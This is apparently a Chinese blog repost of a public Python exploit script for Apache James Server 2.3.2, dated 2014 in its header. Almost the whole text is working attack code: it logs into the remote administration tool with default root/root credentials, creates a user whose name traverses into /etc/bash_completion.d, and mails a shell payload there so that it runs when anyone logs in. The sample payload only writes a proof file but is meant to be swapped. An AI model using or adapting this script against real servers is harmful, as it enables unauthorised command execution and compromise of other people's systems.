Apache James Server 2.3.2 - Remote Command Execution-白红宇

Apache James Server 2.3.2 - Remote Command Execution

阅读量：2435 次

发布时间：2019-05-10

本文共 2306 字，大约阅读时间需要 7 分钟。

#!/usr/bin/python## Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution# Date: 16\10\2014# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec# Vendor Homepage: http://james.apache.org/server/# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip# Version: Apache James Server 2.3.2# Tested on: Ubuntu, Debian# Info: This exploit works on default installation of Apache James Server 2.3.2# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d import socketimport sysimport time # specify payload#payload = 'touch /tmp/proof.txt' # to exploit on any user payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root# credentials to James Remote Administration Tool (Default - root/root)user = 'root'pwd = 'root' if len(sys.argv) != 2:    sys.stderr.write("[-]Usage: python %s 
   
    \n" % sys.argv[0])    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])    sys.exit(1) ip = sys.argv[1] def recv(s):        s.recv(1024)        time.sleep(0.2) try:    print "[+]Connecting to James Remote Administration Tool..."    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    s.connect((ip,4555))    s.recv(1024)    s.send(user + "\n")    s.recv(1024)    s.send(pwd + "\n")    s.recv(1024)    print "[+]Creating user..."    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")    s.recv(1024)    s.send("quit\n")    s.close()     print "[+]Connecting to James SMTP server..."    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    s.connect((ip,25))    s.send("ehlo team@team.pl\r\n")    recv(s)    print "[+]Sending payload..."    s.send("mail from: <'@team.pl>\r\n")    recv(s)    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")    recv(s)    s.send("data\r\n")    recv(s)    s.send("From: team@team.pl\r\n")    s.send("\r\n")    s.send("'\n")    s.send(payload + "\n")    s.send("\r\n.\r\n")    recv(s)    s.send("quit\r\n")    recv(s)    s.close()    print "[+]Done! Payload will be executed once somebody logs in."except:    print "Connection failed."

转载地址：http://yommb.baihongyu.com/

你可能感兴趣的文章